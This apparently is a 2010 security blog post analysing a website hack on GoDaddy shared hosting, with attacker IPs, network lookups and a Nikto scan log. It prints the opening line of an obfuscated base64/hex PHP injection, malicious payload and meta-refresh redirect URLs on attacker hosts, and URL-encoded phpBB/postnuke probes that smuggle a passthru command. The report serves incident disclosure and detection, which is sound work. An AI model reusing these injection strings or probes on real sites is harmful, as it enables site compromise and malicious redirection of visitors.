Follow @BPSPro

Website Hack Report – Case Study For Recent Website Hacks During September, October and November

3 Comments RSS Site Feed Author: AITpro Admin
Published: November 2, 2010
Updated: April 4, 2011

Hack Attack details For Recent GoDaddy Website Hack
Hack Date: October 31, 2010 11:30pm PST

 * In no way, shape or form is this report intended to reflect negatively on GoDaddy web hosting.  AIT-pro.com is hosted on GoDaddy and will continue to use GoDaddy web hosting.  We could not be any more pleased than we already are with GoDaddy web hosting services and support.
 
Attack Method – Initial SQL Injection – For the primary purpose of redirection to specified encoded IP. Upon site visit – download and cache of additional payload files used for successful execution of additional IP redirection. True goal / intention appears to be masked with several layers of subterfuge tactics to give the appearance of a classic malware infection. Desired end result possible traffic boost. Not conclusive. True intentions could have just been simply to disrupt GoDaddy web hosting services.
 
Base64 Code Injection String (only including first line of base64 code injection for search purposes)
$_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8b7b1f=
 
ChLoE – Level 9
CClearHost – Non-Conclusive
Design & Intention – Non-destructive – Primary Desired Result Redirection to intended IP or disruption of services. The ultimate beneficiary is not 100% absolutely clear.
Possible Motive / Goal – Visitor Traffic Rank Increase by Redirection
Indirect Beneficiary – Host globalnet.ba *I am not implying that globalnet.ba is responsible for this attack to increase ranking. It is clear that they do benefit indirectly from this attack, but there is no direct link to insomniaboldinfoorg.com & globalnet.ba except for the fact that insomniaboldinfoorg.com and other domains launching this attack are hosted on globalnet.ba web hosting. This web host could be a victim in these attacks as well.
 
Attack Dates | IP Addresses Involved
 
Sept 17 | 77.78.239.53 (most likely other IPs in this subnet as well)
Later Sept –Early Oct | 77.78.239.53 (most likely other IPs in this subnet as well) – total of 7 different domains with same IP
Oct 19 – 21 | 77.78.239.53 (most likely other IPs in this subnet as well) – total of 3 different domains with same IP
Oct 31 11:30pm PST | 77.78.239.53, 77.78.247.28, 77.78.201.251
 
Alexa Graph
 
Although the attack dates do not match up exactly with the resulting ranking increases displayed in the Alexa graph above there is a definite similarity in the pattern and of course all of these attacks originate from the same IP block and subnet. Other factors include how accurately the Alexa graph displays results by date. Ie realtime vs post DB update. How accurately attack dates are reported. Ie I see several conflicting dates of attack. I am only 100% positive of all data collected for Oct 31 because I personally tracked the attack from T +20 minutes to T + 24 hours. Once again this web host could also be a victim in these attacks.
 
Netrange 77.0.0.0 – 77.255.255.255
Domain insomniaboldinfoorg.com
Sarajevo Bosnia and Herzegovina
 
Known IP Addresses involved
IP 77.78.239.53
IP 77.78.247.28
IP 77.78.201.251
 
ISP
Bosnia And Herzegovina Sarajevo Globalnet Bh
inetnum: 77.78.241.0 – 77.78.247.255
netname: GLOBALNET-ISP
descr: GlobalNET BH
descr: Internet Service Provider
descr: http://www.globalnet.ba/
address: Bosnia and Herzegovina
nic-hdl: JB1004
 
Additional Payload Files involved
Javasript Files Involved (detectable)
Function: Encoder / Decoder
Javascript file yirvqjkm.js origin = IP 77.78.247.28
Full domain path to js script file >>> http://77.78.247.28/js/1/yirvqjkm.js
 
Javascript file functions.js origin = IP 77.78.247.28
Full domain path to js script file >>> http://77.78.247.28/js/functions.js
 
HTML Files Involved (detectable)
Source of HTML file
http://77.78.201.251/index.php?H20=qW&09G=C99VM9AHQ5&Lm9=
XM20oJUs2K15U&3KO=0T5A1EFFMOAQS86&tsov=
ZwSmlMBktyAgoKf3wAZmMGPj1GMw%3D%3D&62Z=
31454OXHOJA6X077C&KaucT=TBJMlAaLyIxPx44N0RGXG1YLSR&3T=
321IX6T2AA7BB&bos=SEkHM2o0fz&9zKS=022HN2RV6JX5GS2Y%2FKUUgLjd
 
Redirect code within above HTML file
<meta http-equiv="refresh" content="0; url=http://77.78.247.28/index.php?e55E=
gEvW&7i8P4=5275WR6EX&nZ56= iZgcVtzKFdTUgctLQgHCQwAZQAMCWlAKj08&8iBAL=
B8DJ10&d69=AA95AwYIJAUzfzR%2BKwEFCFQII&7IS= 127808F8J95PJEE&Yh=
My5dICE%2BTC0nV&R068=36KQ95147W241X4ONHOWW0dEQ&V2W=
GcvXDZJWg8jITlUVWhc&au=ExPAX5%2FDQUf&ff=1A0KXdzDAcBBzNnB" />
 
PHP Files Involved – several (not retrievable)
Remote PHP script execution appear not to be intended to be cached
 
DNS Lookup For 77.78.247.28
Spoof – 28.247.78.77.in-addr.arpa. IN PTR
Spoofed to United States Columbus Dod Network Information Center
 
globalnet.ba Information
nameserver: ns1.globalnet.ba
nameserver: ns2.globalnet.ba
nameserver: rns.globalnet.ba
 
Nodes to Final Destination
188.64.105.30 – Ljubljana Slovenia
77.77.197.34 – globalnet.telemach.ba
77.78.192.5 – Unknown
77.78.192.15 – globalnet.ba
 
blacklist_zone domain status Submitted Added Rejected Removed
whois ba Listed Apr 16, 2004 9:26 EDT Apr 16, 2004 11:07 EDT Never Never
 
General Info and reputation of web host
 
Globalnet.ba is a domain controlled by three name servers at globalnet.ba themselves. Two of them are on the same IP network. The primary name server is ns1.globalnet.ba. Incoming mail for globalnet.ba is handled by five mail servers at googlemail.com and google.com. Two mail servers have the same IP number. All four of them are on different IP networks. globalnet.ba has one IP number (77.78.192.15) , which also has a corresponding reverse pointer.
 
Www.globalnet.ba cnames to this hostname. Crtaci.gnet.ba, int.gnet.ba, www.crtaci.gnet.ba, vpsmachine.int.gnet.ba and root.vpsmachine.int.gnet.ba point to the same IP. Teamwaffle.net use this as a name server under another name. Rental.ba, hackforums.net, casper.ba, nkcelik.info, bihnet.org and at least 31 other hosts share name servers with this domain. Telemach.ba, irc.bolchat.org, 249.77.77.in-addr.arpa, 251.77.77.in-addr.arpa, 250.77.77.in-addr.arpa and at least two other hosts share name servers under another name with this domain. Ifesgulf.com, joshua.net, fedro.com, quivive.nl, gregbiggers.com and at least 200 other hosts share mail servers with this domain. Heartthegamer.com, contea.net, slimverdienen.com, hillsc.net, butysportowe.net and at least 16 other hosts share mail servers under another name with this domain. Pptp-200-sa.globalnet.ba, analyzer-eth1.globalnet.ba, secure.globalnet.ba, ns4.globalnet.ba, ns3.globalnet.ba and at least 31 other hosts are subdomains to this hostname.
 
in bgp route record prefix description
AS42560 AS42560
AS42983
77.77.192.0/18 main route block main route block
(unannounced) AS42560 77.77.194.0/23 TELEMACH
(unannounced) AS42560 77.77.196.0/22 TELEMACH
(unannounced) AS42560 77.77.224.0/19 TELEMACH
    77.78.192.0/18 GlobalNET Bosnia
(unannounced) AS42560 77.78.192.0/24 GlobalNET Bosnia
(unannounced) AS42560 77.78.193.0/24 GlobalNET subnet
(unannounced) AS42560 77.78.194.0/24 GlobalNET subnet
(unannounced) AS42560 77.78.195.0/24 GlobalNET subnet
(unannounced) AS42560 77.78.196.0/24 GlobalNET subnet
(unannounced) AS42560 77.78.197.0/24 GlobalNET subnet
(unannounced) AS42560 77.78.198.0/24 GlobalNET subnet
(unannounced) AS42560 77.78.199.0/24 GlobalNET subnet
(unannounced) AS42560 77.78.200.0/24 GlobalNET subnet
(unannounced) AS42560 77.78.201.0/24 GlobalNET subnet
(unannounced) AS42560 77.78.202.0/24 GlobalNET subnet
(unannounced) AS42560 77.78.203.0/24 GlobalNET subnet
(unannounced) AS42560 77.78.204.0/24 GlobalNET subnet
(unannounced) AS42560 77.78.205.0/24 GlobalNET subnet
(unannounced) AS42560 77.78.206.0/24 GlobalNET subnet
(unannounced) AS42560 77.78.207.0/24 GlobalNET subnet
AS42560 MISSING! 77.78.239.0/24  
AS42560 MISSING! 77.78.240.0/24  
AS42560 MISSING! 77.78.248.0/24  
AS42560 MISSING! 77.78.249.0/24  
 
Nikto Scan Results on Shared Host Server that was attacked
 
Can’t locate auto/Net/SSLeay/autosplit.ix in @INC (@INC contains: C:/Perl/site/lib C:/Perl/lib .) at C:/Perl/lib/AutoLoader.pm line 173.
 at C:/Perl/lib/Net/SSLeay.pm line 61
– Nikto v2.1.3
—————————————————————————
+ Target IP:          173.201.92.1
+ Target Hostname:    p3nlhg43c081.shr.prod.phx3.secureserver.net
+ Target Port:        80
+ Start Time:         2010-11-07 15:55:45
—————————————————————————
+ Server: Apache
E:Sat Nov  6 15:55:56 2010 + ERROR: /cgi.cgi/ returned an error: error reading HTTP response
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ ETag header found on server, inode: 14271895, size: 91, mtime: 0x477838c1c0907
E:Sat Nov  6 15:56:10 2010 + ERROR: /index.php3 returned an error: error reading HTTP response
+ Multiple index files found (note, these may not all be unique): default.asp, index.jhtml, index.php, index.htm, index.pl, default.htm, index.as
px, default.aspx, index.asp, index.do, index.cfm, index.cgi, index.html, index.shtml,
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
E:Sat Nov  6 15:56:21 2010 + ERROR: / returned an error: error reading HTTP response
E:Sat Nov  6 15:56:31 2010 + ERROR: / returned an error: error reading HTTP response
E:Sat Nov  6 15:56:54 2010 + ERROR: /postnuke/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%5
0%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 returned an error: error reading HTTP response
E:Sat Nov  6 15:57:13 2010 + ERROR: /phpBB/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5
f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 returned an error: error reading HTTP response
+ 58 items checked: 6 error(s) and 3 item(s) reported on remote host
+ End Time:           2010-11-07 15:57:23 (98 seconds)
—————————————————————————
+ 1 host(s) tested
 
GoDaddy was notified first of our findings before this information was posted.  Post was released on confirmation from GoDaddy that this issue was resolved:  malicious code / worm scan result for postnuke and phpBB.
 
More about Nikto2 Open Source web server scanner…
Skip to toolbar